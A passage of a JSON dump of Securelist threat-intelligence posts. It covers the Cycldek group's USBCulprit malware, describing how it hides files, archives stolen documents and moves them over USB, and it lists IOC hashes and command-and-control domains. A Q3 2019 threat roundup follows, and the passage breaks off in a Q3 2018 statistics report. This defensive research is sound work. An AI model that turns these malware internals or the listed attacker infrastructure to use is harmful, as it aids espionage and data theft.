9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-29T10:36:40", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n## Targeted attacks and malware campaigns\n\n### Mobile espionage targeting the Middle East\n\nAt the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).\n\n### APT33 beefs up its toolset\n\nIn July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year \u2013 tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.\n\n### New FinSpy iOS and Android implants found in the wild\n\nWe recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices \u2013 suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.\n\n### Turla revamps its toolset\n\nTurla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new.NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).\n\n### CloudAtlas uses new infection chain\n\n[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates \u2013 whitelisted per victim \u2013 hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers \u2013 we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).\n\n## Other security news\n\n### Sodin ransomware attacks MSP\n\nIn April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered \u2013 CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.\n\nRansomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).\n\n### The impact of web mining\n\n[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.\n\nThe total power saving can be calculated using the formula \u00b7N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8\u00b111.8 gigawatts (GW) \u2013 twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '\u00b7N\u00b7t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to \u20ac250,000 for residents in Europe.\n\nYou can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).\n\n### Mac OS threat landscape\n\nSome people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.\n\nOur database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category \u2013 these threats are easier to create, offering a better return on investment for cybercriminals.\n\nThe number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years \u2013 by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million \u2013 already an increase of 9% over the previous year.\n\nYou can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).\n\n### Smart home vulnerabilities\n\nOne of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.\n\n### Smart cars and connected devices\n\nKaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience \u2013 from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.\n\nWe found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.\n\nWe continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems \u2013 including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.\n\nIf you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.\n\n### Personal data theft\n\nWe've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) \u2013 CafePress didn't notify its customers until some months after the breach had occurred.\n\nIn August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.\n\n[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.\n\nOn September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.\n\nConsumers have no direct control over the security of the personal data they disclose to online providers. However, we can limit the damage of a security breach at an online provider by ensuring that they create passwords that are unique and hard to guess, or use a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.\n\nIt's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).", "cvss3": {}, "published": "2019-11-29T10:00:12", "type": "securelist", "title": "IT threat evolution Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-11-29T10:00:12", "id": "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "href": "https://securelist.com/it-threat-evolution-q3-2019/95268/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-11-30T17:13:50", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130615/securelist_quarter_threat-990x400.jpg)\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. _\n\n## Q3 figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.\n * 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.\n * Ransomware attacks were registered on the computers of 259,867 unique users.\n * Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,305,015 malicious installation packages\n * 55,101 installation packages for mobile banking Trojans\n * 13,075 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### Q3 events\n\nPerhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked \u2013 and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01-1024x489.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)\n\n_Number of users attacked by the mobile banker Asacub in 2017 and 2018_\n\nThe scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat 